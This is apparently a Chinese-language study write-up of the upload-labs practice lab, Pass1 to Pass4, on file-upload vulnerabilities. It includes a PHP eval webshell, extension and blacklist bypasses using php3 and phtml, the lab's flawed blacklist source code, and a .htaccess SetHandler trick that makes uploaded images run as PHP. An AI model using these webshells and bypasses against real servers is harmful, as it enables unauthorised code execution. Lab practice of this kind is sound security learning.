基础说明
burpsuit不能抓本地localhost(127.0.0.1)的包
ipconfig
这篇文章又说如果和更设置是能抓取本地包,但是我没找着博客
Pass1
写一个webshell
<?php eval(@$_GET['a']); ?>
保存为webshell.jpg
这里的话我是把要上传的文件路径已经选完了(就差最后点击上传了)才用burp拦截请求
然后放包即可
MIME不需要改
至于为什么还能按照php解析呢,尽管Content-Type是jpeg,留个坑
新建一个upload文件夹,上传的文件都会在该文件夹下
上一步我们把jpg改成php,upload文件夹下只有php,既然是php文件那肯定可以被解析成php啊
phpinfo出来了
注意这里的路径因为上传的文件在upload文件夹下
http://10.14.56.86/upload-labs/upload/webshell.php
Pass2
用上一题的解法就可以做出来
Pass3
这一次放包之后,并没有成功
黑名单验证
php3、php4、php5、phpt、phptml都会被解析为php
php2, php3, php4, php5, phps, pht, phtm, phtml(php的别名)
所以这次把jpg改成php3即可
但是用Hacker Bar传参它没反应(是不是没有解析成php啊,我有点懵)
蚁剑也成功连上了
但我就是进不去(我发现我输入一个错误的密码居然也可以连上去)
源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR. '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR .'/'. $_FILES['upload_file']['name'];
$is_upload = true;
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
}
}
$file_name = deldot($file_name);//删除文件名末尾的点 $file_ext = strrchr($file_name, '.'); $file_ext = strtolower($file_ext); //转换为小写 $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA $file_ext = trim($file_ext); //收尾去空
这个让大小写绕过、点绕过、::$DATA都不行了
Pass4
看下源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (!in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
$is_upload = true;
}
} else {
$msg = '此文件不允许上传!';
}
} else {
$msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
}
}
所有后缀名都被加入了黑名单
这一题是.htaccess绕过
.htaccess文件(或者”分布式配置文件”)提供了针对目录改变配置的方法, 即,在一个特定的 文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。所以一个特 定目录下的.htaccess文件中的指令可能会覆盖其上级目录中的.htaccess文件中的指令,即子目录中的指令会覆盖父目录或者主配置文件中的指令
先上传一个.htaccess文件,文件内容如下:SetHandler application/x-httpd-php
这段内容的作用是使所有的文件都会被解析为php文件
再上传一个不被网站限制的木马文件,格式不限 webshell.jpg
内容为<?php phpinfo();?>
upload文件夹下只有这两个文件,我访问webshell.jpg
我又以为得要先访问.htaccess才能生效
但是.htaccess不允许访问